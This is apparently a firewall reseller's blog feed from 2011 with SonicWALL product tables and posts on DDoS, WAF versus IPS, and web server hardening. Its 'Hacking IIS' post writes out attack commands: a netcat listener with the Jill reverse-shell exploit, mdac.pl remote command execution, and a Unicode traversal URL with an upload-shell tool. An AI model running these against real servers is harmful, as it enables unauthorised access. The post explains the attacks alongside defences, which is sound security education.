    <td><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz190-licenses?sonicwallservices_subscription=203">SonicWALL TZ 190</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz190-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_190.jpg" alt="tz 180 cgss" /></a></div></td>
    <td><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz-200-licenses?sonicwallservices_subscription=203">SonicWALL TZ 200</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz-200-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_100.jpg" alt="tz 200 cgss" width="101" height="100" /></a></div></td>
    <td><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz210-licenses?sonicwallservices_subscription=203">SonicWALL TZ 210</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz210-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/tz_210.jpg" alt="tz 210 cgss" width="101" height="100" /></a></div></td>
    <td>&nbsp;</td>
  </tr></table><br>
<br>
<table class="data-table" id="product-attribute-specs-table">
  <tr class="odd">
    <td colspan="4" STYLE="background-color: rgb(246, 246, 246); padding:6px"><h4>SonicWALL PRO Series Security Suite</h4></td>
  </tr>
  <tr class="even">
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-1260-licenses?sonicwallservices_subscription=203">SonicWALL PRO 1260</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-1260-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_1260.jpg" alt="pro 1260 cgss" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-2040-licenses?sonicwallservices_subscription=203">SonicWALL PRO 2040</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-2040-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_2040.jpg" alt="pro 2040 cgss" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-3060-licenses?sonicwallservices_subscription=203">SonicWALL PRO 3060</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-3060-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_3060.jpg" alt="pro 3060 cgss" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-4060-licenses?sonicwallservices_subscription=203">SonicWALL PRO 4060</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-4060-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_3060.jpg" alt="pro 4060 cgss" /></a></div></td>
  </tr>
  <tr class="even">
    <td ><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-4100?sonicwallservices_subscription=203">SonicWALL PRO 4100</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-4100?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_4100.jpg" alt="pro 4100 cgss" /></a></div></td>
    <td ><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-5060-licenses?sonicwallservices_subscription=203">SonicWALL PRO 5060</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-pro-5060-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/pro_5060.jpg" alt="pro 5060 cgss" /></a></div></td>
    <td >&nbsp;</td>
    <td ">&nbsp;</td>
  </tr></table><br>
<br><table class="data-table" id="product-attribute-specs-table">
  <tr class="odd">
    <td colspan="4" STYLE="background-color: rgb(246, 246, 246); padding:6px"><h4>SonicWALL NSA Series Security Suite</h4></td>
  </tr>
  <tr class="even">
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-240-licenses?sonicwallservices_subscription=203">SonicWALL NSA 240</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-240-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/nsa_240.jpg" alt="nsa 240 cgss" width="160" height="57"/></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-2400-licenses?sonicwallservices_subscription=203">SonicWALL NSA 2400</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-2400-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/nsa_2400.jpg" alt="nsa 2400 cgss" width="160" height="57"/></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-3500-licenses?sonicwallservices_subscription=203">SonicWALL NSA 3500</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-3500-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/nsa_4500.jpg" alt="nsa 3500 cgss" width="160" height="57"/></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-4500-licenses?sonicwallservices_subscription=203">SonicWALL NSA 4500</a></h3>
    <div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-4500-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/nsa_4500.jpg" alt="nsa 4500 cgss" width="160" height="57"/></a></div></td>
  </tr></table><br>
<br><table class="data-table" id="product-attribute-specs-table">
  <tr class="odd">
    <td colspan="4" STYLE="background-color: rgb(246, 246, 246); padding:6px"><h4>SonicWALL E-Class NSA Series Security Suite</h4></td>
  </tr>
  <tr class="even">
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e5500-licenses?sonicwallservices_subscription=203">SonicWALL NSA E5500</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-tz-100-licenses?http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e5500-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/ensa_5500.jpg" alt="NSA E5500 cgss" width="160" height="57" /></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e6500-licenses?sonicwallservices_subscription=203">SonicWALL NSA E6500</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e6500-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/ensa_5500.jpg" alt="NSA E6500 cgss" width="160" height="57"/></a></div></td>
    <td width="25%"><h3><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e7500-licenses?sonicwallservices_subscription=203">SonicWALL NSA E7500</a></h3><div align="center"><a href="http://www.firewalls.com/sonicwall-software-subscriptions/sonicwall-firewalls/sonicwall-nsa-e7500-licenses?sonicwallservices_subscription=203"><img  src="http://static.firewalls.com/media/wysiwyg/firewalls/ensa_5500.jpg" alt="NSA E7500 cgss" width="160" height="57"/></a></div></td>
    <td width="25%">&nbsp;</td>
  </tr>
</table>
]]></description>
      <pubDate>Wed, 24 Aug 2011 17:20:23 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Distributed Denial of Service Attack]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/distributed_denial_of_service/</link>
      <description><![CDATA[<table>
  <tr>
    <td height="97"><img src="http://static.firewalls.com/skin/frontend/default/firewalls/images/blog_ddos_attack.jpg" alt="Distributed Denial of Service Attack" width="160" height="200" /></td>
    <td><p>Distributed Denial of Service (DDoS) attacks are undeniably  the most  dangerous and devastating known  in network security. Usually these attacks are targeted on high profile web  servers; Yahoo, eBay, PayPal and many others have been targeted in the past. </p><h2><strong>What is the  attack?</strong></h2>
<p> DoS attacks are basically packet storms that are targeted  over to the victim. The victim following regular protocol keeps replying to  spoofed requests until all of its resources are saturated resulting in a <strong>Denial of Service</strong>.</p></td>
  </tr>
</table>

<h2><strong>Why  Distributed?</strong></h2>
<p> Hackers use different mechanisms to first gain an army of  compromised computers called zombies. These zombies can then be commanded by  the hacker to flood the victim.</p>
<p> To capture and infect machines, hackers scan an address space  for a known vulnerability. Identified machines are infected by installing the  program.</p>
<p> Typical architecture of a DDoS attack involves a handler.  Handler is an infected machine that controls hundreds of zombies. Once the  attacker has enough zombies, he can take down anything. Some of the recent  attacks have seen paid Cloud Computing services being used for the purpose.</p>
<p align="center""><img src="http://static.firewalls.com/skin/frontend/default/firewalls/images/ddos_attack_diagram.jpg" alt="Distributed Denial of Service Attack" /></p>
<h2><strong>Defense</strong></h2>
There are many programs available to stir a DDoS attacks.  Smurf, Tiroon etc. Attacks can be varied as some might use ICMP echo, some UDP, some TCP SYN.
<h3><strong>Firewalls</strong></h3>
<p> Firewalls can greatly reduce chances of a DDoS. Firewall  settings play an important rule. ICMP echo can be denied. A three way handshake  can be set mandatory validated by the firewall instead of forwarding the  request to the server. This will stop an SYN flood.</p>
<p align="center"><img src="http://static.firewalls.com/skin/frontend/default/firewalls/images/ddos_attack_flow.jpg" alt="Distributed Denial of Service Attack" /></p>
<h3><strong>Routers and  Switches</strong></h3>
<p> Switches can deep scan incoming packets and look for a  pattern. If the pattern seems odd, they can be filtered off before reaching the  server. This is called ingress and egress filtering.</p>
]]></description>
      <pubDate>Sat, 13 Aug 2011 04:03:32 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Web Application Security Series – Firewall vs IPS]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/web_application_firewall_vs_ips/</link>
      <description><![CDATA[<p>The debate of WAF(Web Application Firewall) vs IPS(Intrusion Prevention System) is not new nor looks to settle in the near future.</p><p>Combining the evolution of IPS solutions with aggressive marketing some IPS (only) vendors claim complete web application protection, often making reference to the OWASP Top 10 Web Application Security Risks threats list to argument their offer; but is it so?</p> <p align="center"><img src="http://www.firewalls.com/media/upload/image/ips_compl_prot.png" alt="OWASP Top 10 Web Application Security Risks" /></p> <p>At a glance IPS and WAFs look similar in certain ways; they both can be hardware or software based or have similar deployment modes.</p><p align="center"><img src="http://www.firewalls.com/media/upload/image/ips_waf_simil.png" alt="IPS and WAF" /></p><p>If we look closer we will notice that currently the IPS tends to be integrated into an UTM gateway or NGFW(closer integration) whereas the WAF can be made part of a remote access solution which includes various VPN features.<br />Rare cases when the WAF is integrated into an UTM or NGFW; both can be found offered as standalone solutions.</p> <p align="center"><img width="389" height="81" src="http://www.firewalls.com/media/upload/image/ips_waf_dif_3.png" alt="" /></p> <p>The WAF usually addresses inbound access to web applications; specialized coverage.<br />The IPS can address inbound and outbound access; broader coverage.</p><p align="center"><img width="538" height="324" src="http://www.firewalls.com/media/upload/image/ips_waf_dif_1.png" alt="WAF" /></p><p>On the other side, the WAF can also make use of attack signatures but due to its layer of intelligence can deal better with evasion attacks.</p><p>Can intercept and modify both application requests and responses, thus can sanitize the requests and prevent the leak of unwanted responses like error messages.</p><p>Can mitigate against potential 0-days injection attacks because it can apply positive logic: consider the case of a login web page where user input is not filtered appropriately on the application itself; the WAF can detect the login page, the login form and filter as instructed the user input.</p><p>Additionally the IPS cannot proactively block CSRF attacks, while the WAF can by adding a token to users' URLs and upon submission verifying if the correct token was supplied or by checking the Referer HTTP header.<br />Plus the WAF can provide features like authentication and authorization.<br />&#160;</p><p>The WAF specializes in providing protection against web applications and databases attacks, while the IPS includes part of its wider protection suite limited mitigation against web applications attacks concomitantly addressing many other threats like worms or network attacks.</p><p style="background:#CCC; margin-left:10px">•&#160;&#160;&#160; Key differences between WAF and IPS – the WAF has web application logic while the IPS covers a wide range of attacks occurring over various protocols and provides higher throughput.</p><p>When it comes to attacks against web applications, the IPS rather includes a negative model; provides signatures for known generic attacks plus specific attacks against various web applications(like XSS in Microsoft SharePoint Server 2007 CVE-2010-0817). It does not understand the application context of requests or responses as it does not have web application state knowledge.<br />Susceptible to advanced evasion techniques.</p><p align="center"><img width="431" height="402" src="http://www.firewalls.com/media/upload/image/ips_waf_dif_2.png" alt="Susceptible to advanced evasion techniques" /></p><h3>The case of SonicWall</h3><p>Offers both IPS and WAF solutions.</p><p>The IPS is deeply integrated into SonicWall's NGFW through the NSA series for better management and threat coverage, while the WAF is available as a service part of the enterprise remote access solution through the SRA series.</p><p>They can make use of dynamically updated signatures.</p><p align="center"><img width="578" height="314" src="http://www.firewalls.com/media/upload/image/sonicwal_waf_ips.png" alt="SonicWall Offers both IPS and WAF solutions" /></p><h3>Conclusion</h3><p>The IPS offers some protections for web applications; however WAF's capabilities are superior in this area; so for advanced overall threat coverage(inbound + outbound access) you need both.<br />They will probably not merge anytime soon for example due to performance reasons.<br /><br /><br />&#160;</p>]]></description>
      <pubDate>Thu, 07 Jul 2011 21:12:54 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Web Application Security Series – Hacking IIS]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/hacking-iis/</link>
      <description><![CDATA[<h3>Hacking IIS</h3> <table>   <tbody><tr>     <td>&#160;<img style="width: 177px; height: 86px;" alt="Hack Internet Information Service" src="http://www.firewalls.com/media/upload/image/hack_iis.gif" /></td>      <td>IIS, Internet Information Services is a web server application that is shipped with the Windows operating system. It is one of the most widely used web server. IIS has some major loop holes that can compromise the security of your server.</td>   </tr> </tbody></table>  <h3>IIS Interrogation</h3>  <table>   <tbody><tr>     <td valign="top">If someone is going to try to hack through a web server application such as IIS, he will first gather information regarding your system. Using techniques such as banner grabbing or using a vulnerability scanner, he may dig some useful information and focus on a specific machine.   Assume, a malicious hacker has successful identified the web server as IIS and Windows NT as the operating system.</td>     <td valign="top"><img alt="Internet Information Services 7 Console" src="http://www.firewalls.com/media/upload/image/Internet_Information_Services_7_Console.png" style="width: 167px; height: 115px;" /></td>    </tr> </tbody></table>  <h3>Buffer Overflow</h3> <p>Buffer overflow occurs when a program overflows the memory available to its buffer. One of the DLL files in the IIS can be exploited due to a buffer overflow flaw.<br />   Jill is an exploit that causes a buffer overflow and connects a remote shell back. <br />   First, the attacker will start a listening service on his system.</p><div style="margin-left:20px; background-color:#FFC; padding:10px; width:340px">C:&gt;nc –l –p 4000 (any random port would do)</div><p>Then run the Jill exploit</p><div style="margin-left:20px; background-color:#FFC; padding:10px; width:340px">C:&gt;jill victim_IP 80 attacker_IP 4000</div><p>And the attacker is in!<br /> (iis5hack and jill-win32 are other tools that implement this exploit)</p><p>&#160;</p> <h3>MDAC Local Command Execution</h3> <p>MDAC is a scary component of IIS that allows a remote attacker to execute a command on the local machine.<br />   A readymade exploit is available at www.wiretrip.net/rfp called mdac.pl</p><div style="margin-left:20px; background-color:#FFC; padding:10px; width:340px">C:\&gt;mdac.pl –h victim_IP</div><p>If the victim is vulnerable, the mdac.pl will ask for a command to execute on the victim's system. Someone with the wrong intentions can wreck havoc in a few commands.</p><p>&#160;</p> <h3>IIS Directory Hack</h3> <p>This one occurs due to a problem in interpreting "/" and "\" in a URL by IIS.<br />   The Unicode for these special characters are %c0%af and %c1%9c respectively. The attack works by embedding a command in the URL after these unicodes and injecting through HTTP. IIS will parse the command as valid, and execute it locally.<br />   An example URL could be</p><div style="margin-left:20px; background-color:#FFC; padding:10px; width:380px">http://www.victim.com/scripts/..%c0%../command_to_execute</div><p>unicodeloader.pl is an exploit that uses this flaw to compromise a remote system. It creates a webpage on the system that is accessible to the attacker and allows to upload anything on the server.</p><div style="margin-left:20px; background-color:#FFC; padding:10px; width:380px">C:/&gt;unicodeloader.pl victim_ip 80 remote_path_to_upload</div><p>This command will make a file upload.asp on victim server that will allow the attacker to upload anything on the remote path given in the command.</p><p>&#160;</p> <h3>Defense</h3> <p>IIS has a solid support of developers that fix many of its vulnerabilities. Keeping up with the updates, versions and hot fixes will keep your system immune to most of the exploits.<br />   Install IIS on a different drive than the one used by your OS. Stay away from C:/&gt; drive. It's too common.<br />   Unmap all unused DLL components and extensions.</p>]]></description>
      <pubDate>Wed, 06 Jul 2011 14:54:23 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Web Application Firewalls]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/web_application_firewalls/</link>
      <description><![CDATA[<h3>What is a Web Application Firewall (WAF)?</h3><table><tbody><tr><td><img src="/media/upload/image/waf(1).png" alt="What is a Web Application Firewall(WAF)?" style="width: 80px; height: 80px;" /></td><td>Some people may not realize it but there isn’t a straight definition for a WAF. <br />We can refer to it as to a network or host based&#160; security technology that acts as middle man analyzing layer 7 traffic flow(at session level not at packet level) with the purpose of enhancing the security of a web application.</td></tr></tbody></table><p><img src="/media/upload/image/waf_types.png" alt="Web Application Firewall(WAF)" /></p><h3><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">SonicWall’s WAF approach</a></h3><p>Appliance based solution with a reverse proxy architecture.<br />The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF is subscription-based software</a> that runs on the <a href="http://www.firewalls.com/sonicwall/sra">SonicWALL SRA</a> or <a href="http://www.firewalls.com/sonicwall/sonicwall-ssl-vpn-price-review">SSLVPN</a> appliance and protects the web applications running on servers behind the appliance.</p><p><img width="601" height="226" src="/media/upload/image/sonicwall_approach.png" alt="SonicWall WAF " /></p><p>The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF </a>is a component of a complete enterprise <a href="http://www.firewalls.com/sonicwall/sra">remote access solution</a>.<br />Both hardware and virtual appliance are available.</p><h3><a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">What a WAF can do?</a></h3><p>To mention a few capabilities:<br />•&#160;&#160;&#160; » Virtual patching - although ideally you would fix the code itself, in practice this is not always possible; consider the case of a commercial web application, you will have to wait for a patch from the vendor and the patch may never come(CVE-2010-3213 and MS OWA 2003).<br />•&#160;&#160;&#160; » Web application hardening - attack surface reduction; limit the request HTTP methods, HTTP headers or user input allowed; proactively mitigate CSRF vulnerabilities by appending a token to users’ URLs and upon submission verify if the correct token was supplied.<br />•&#160;&#160;&#160; » Web Server hardening - protect the web server against various attacks with signatures or simply by proxying the requests(proactive protection against attacks like Slowloris HTTP DoS) and limit the allowed HTTP features(block the use of WebDav).<br />•&#160;&#160;&#160; » HTTP protocol validation - mitigate against protocol exploits and evasion techniques.</p><h3>But I have an IPS</h3><p>The main difference between an IPS and a <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF </a>is the application logic, the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF </a>has application state awareness.<br />A <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF </a>keeps track of the application specific context of requests and responses; an IPS rather follows the packet flow doing some form of protocol inspection and searching for known attacks patterns.<br /><img width="327" height="237" src="/media/upload/image/waf_ips.png" alt="Cross-site Request Forgery(CSRF)" /></p><p>The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">WAF</a> is able to follow the data flow, for example validating user input per a specific web form.<br />The IPS on the other hand, does not really understand that the web form should be submitted using POST and that only numbers are supposed to be considered valid user input; or the IPS cannot proactively mitigate Cross-site Request Forgery(CSRF) vulnerabilities.</p><h3>What <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-web-application-firewall">SonicWall’s WAF</a> offers?</h3><p>Multiple protection levels and features are available.<br /><img width="572" height="487" src="/media/upload/image/sonicwall_waf.png" alt="SonicWall Web Application Firewalls" /></p><p><br />»&#160;&#160;&#160; Injection attack protection: XSS, SQLi.<br />»&#160;&#160;&#160; CSRF protection.<br />»&#160;&#160;&#160; HTTPS traffic inspection.<br />»&#160;&#160;&#160; Positive security model with rules: blocks form submission with unwanted parameters, bad login, malicious input to a form, etc.<br />»&#160;&#160;&#160; Negative security model: dynamically updated signature database.<br />»&#160;&#160;&#160; Virtual Patching.<br />»&#160;&#160;&#160; Cloaking: filters out response headers that could provide information to clients about the backend web server.<br />»&#160;&#160;&#160; Web server protection.<br />»&#160;&#160;&#160; Application layer DoS protection: protection against Slowloris; rate limiter.<br />»&#160;&#160;&#160; Strong authentication: token-based two-factor authentication, client certificate authentication and tokenless one-time passwords.<br />»&#160;&#160;&#160; Strong authorization: granular access policies based on hostname, subnet, IP address, port and URL path.<br />»&#160;&#160;&#160; Anti-evasion capabilities: using request normalization.<br />»&#160;&#160;&#160; Forced browsing: prevent the enumeration and access of resources that are not referenced by an application, but are still accessible.<br />»&#160;&#160;&#160; HTTP protocol validation.<br />»&#160;&#160;&#160; Reporting and Monitoring.<br />»&#160;&#160;&#160; SSL hardware acceleration.<br />»&#160;&#160;&#160; Content Caching.<br />»&#160;&#160;&#160; GZIP compression.</p>]]></description>
      <pubDate>Sat, 02 Jul 2011 14:55:41 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Web Application Security Series: Introduction]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/web_application_security_introduction/</link>
      <description><![CDATA[<table><tbody><tr><td><img src="http://www.firewalls.com/images/stay-secure-doc.png" alt="Saty Secure: Learning Series" /></td><td>Web application is a software program that enables the Internet to perform complex tasks. Advances in these applications have enabled the Internet to be an alternative medium of massive real world business such as shopping, banking and education.</td></tr></tbody></table><h2>Where is the threat?</h2><p>This is a typical web application architecture layout. The arrows between each of the layer are the transport protocol HTTP.</p><p><img src="/media/upload/image/web_application_security.PNG" alt="web application architecture " style="width: 716px; height: 170px;" /></p><p>Each of these (including HTTP as a transport mechanism) are prone to hacking. Any of these can be compromised to give complete access to your network.</p><h2>Transport</h2><p>HTTP is the de facto standard protocol for communication. As we have seen in a previous post on <strong>banner grabbing</strong>, HTTP is very insecure and reveals critical information.</p><p>HTTP is a stateless protocol. It takes a request and responds. However, cookies are used to implement some sort of state or session.</p><p>SSL (secured socket layer) is a protocol that provides encryption for HTTP. This resolves one issue with HTTP that is clear text communication. Used in sites that deal with credit card information.</p><h2>Web Servers</h2><p>Web servers integrate the applications and client. Apache and IIS (Microsoft) are the most widely used.</p><p>Apache is a secure server, however some of its versions have vulnerabilities that could be fatal. Most of these vulnerabilities come from additional modules that are added to the server.</p><p>IIS (Internet Information System) is widely used and has been through some major attacks</p><h2>Harden your Web Server</h2><p>The most important step in hardening a web server is patching religiously. Both Apache and IIS have a strong development team that release security patches as soon as a loop hole is found.</p><p>Implement appropriate network egress filtering. Using a firewall, you can deny all outbound connections and replies (except legitimate established connections).</p><p>Some free vulnerability scanners can be used find security holes in your server.</p><p>Nikto(http://www.cirt.net/nikto2) is a free web scanning utility that can provide you with a comprehensive report of vulnerabilities in your server. Nikto is not a stealth scanner and will show up in log files, so use it for testing purposes only.</p><p>Paros Proxy, Burp Suite and Typhoon are other free alternatives to find vulnerabilities in your web server. For a more professional and aggressive scan, you may want to invest in a commercial tool such as Acunetix Enterprise Web Vulnerability Scanner(http://www.acunetix.com/).</p>]]></description>
      <pubDate>Sat, 02 Jul 2011 03:39:46 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL WXA 4000 and WXA 2000 are now in Stock!]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/wxa4000_wxa2000_buy_review/</link>
      <description><![CDATA[<p align="center"><img src="http://www.firewalls.com/media/upload/image/20110509115906ENPRNPRN-SONICWALL-WXA-SERIES-90-1304942346MR.jpg" alt="SonicWALL WXA 4000 and WXA 2000" /></p><p>The SonicWALL® WAN Acceleration Appliance (WXA) Series reduces application latency and conserves bandwidth, significantly enhancing WAN application performance and user experience for small- to medium-sized organizations with remote and branch offices. After initial data transfer, the WXA Series dramatically reduces all subsequent traffic by transmitting only new or changed data across the network. The WXA de-duplicates data traversing the WAN, thus reducing application latency and conserving bandwidth. Other acceleration features include data caching, metadata caching and data-in-flight compression.</p> <p>WXA solutions are integrated add-ons to SonicWALL E-Class Network Security Appliance (NSA), NSA and TZ Series appliances that are deployed as Next-Generation Firewalls. This integrated solution streamlines the placement, deployment, configuration, routing, management and integration of WXA with other components, such as VPNs. When deployed in conjunction with SonicWALL Application Intelligence and Control Service, the WXA offers the unique combined benefit of both prioritizing application traffic (using QoS or bandwidth management) and minimizing traffic between sites, resulting in optimal network performance.</p>  <h2>Features &amp; Benefits:</h2> <ul style="margin-left:25px"> <li><strong>» Simplified deployment </strong>through complete provisioning and configuration by a SonicWALL firewall drastically reduces the complexity of deploying, routing and integrating multiple WXA appliances across the network.</li> <li><strong>» Increased security</strong> using SonicWALL Reassembly-Free Deep Packet Inspection™ technology provides an additional layer of security by scanning all traffic and data for threats before sending it to the WAN acceleration appliance.</li> <li><strong>» Protocol optimization </strong>provides LAN-like application performance for users accessing resources over the WAN by decreasing the latency and chattiness presented by inefficient protocols or application communication.</li> <li><strong>» Byte caching and file caching </strong>reduce bandwidth consumption by orders of magnitude, extending the life of existing WAN links and providing a better user experience.</li> <li><strong>» Reduced total cost of ownership (TCO) </strong>arrives through increased efficiency and overall utilization of existing WAN bandwidth, which in turn avoids costly and unnecessary WAN upgrades.</li> <li><strong>» Data compression</strong> across the WAN increases performance and reduces latency.</li> <li><strong>» Windows File Sharing (WFS) acceleration</strong> helps improve response times while decreasing the amount of data transferred when downloading or accessing files from a shared drive.</li> <li><strong>» Visualization</strong> delivers real-time insight into the performance gains obtained by introducing WAN acceleration into the network.</li> </ul> <h2>Deployment Scenarios:</h2> <p><img width="705" height="496" alt="WXA 4000" src="http://www.dttstores.com/images/WXA-deployment-scenarios.png" /></p> <h2>SonicWALL WXA Model Comparison</h2> <div align="center">&#160;</div><table class="data-table" id="product-attribute-specs-table"> <tbody><tr class="even"> <td><h3>Specifications</h3></td> <td><h3 align="center"><a href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator/wxa-4000">WXA 4000</a></h3></td> <td><h3 align="center"><a href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator/wxa-2000">WXA 2000</a></h3></td> </tr> <tr class="even"> <td>Platform</td> <td><div align="center">Hardware Appliance</div></td> <td><div align="center">Hardware Appliance</div></td> </tr> <tr class="even"> <td>Maximum Users</td> <td><div align="center">240</div></td> <td><div align="center">120</div></td> </tr> <tr class="even"> <td height="23">Maximum Flows</td> <td><div align="center">1200</div></td> <td><div align="center">600</div></td> </tr> <tr class="even"> <td><h3>Features</h3></td> <td><h3 align="center"><a href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator/wxa-4000">WXA 4000</a></h3></td> <td><h3 align="center"><a href="http://www.firewalls.com/sonicwall/sonicwall-wan-accelerator/wxa-2000">WXA 2000</a></h3></td> </tr> <tr class="even"> <td>Byte Caching</td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> </tr> <tr class="even"> <td>Protocols</td> <td><div align="center">&#160;</div></td> <td><div align="center">&#160;</div></td> </tr> <tr class="even"> <td>TCP/File Compression</td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> </tr> <tr class="even"> <td>WFS Acceleration</td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> </tr> <tr class="even"> <td>Management</td> <td><div align="center">&#160;</div></td> <td><div align="center">&#160;</div></td> </tr> <tr class="even"> <td>TCP/File Compression</td> <td><div align="center"><img width="8" height="8" alt="Available" src="http://www.firewalls.com/images/table_dot_SF_cdp.gif" /></div></td> <td><div align="center"><img width="8" height="8" alt="Available" 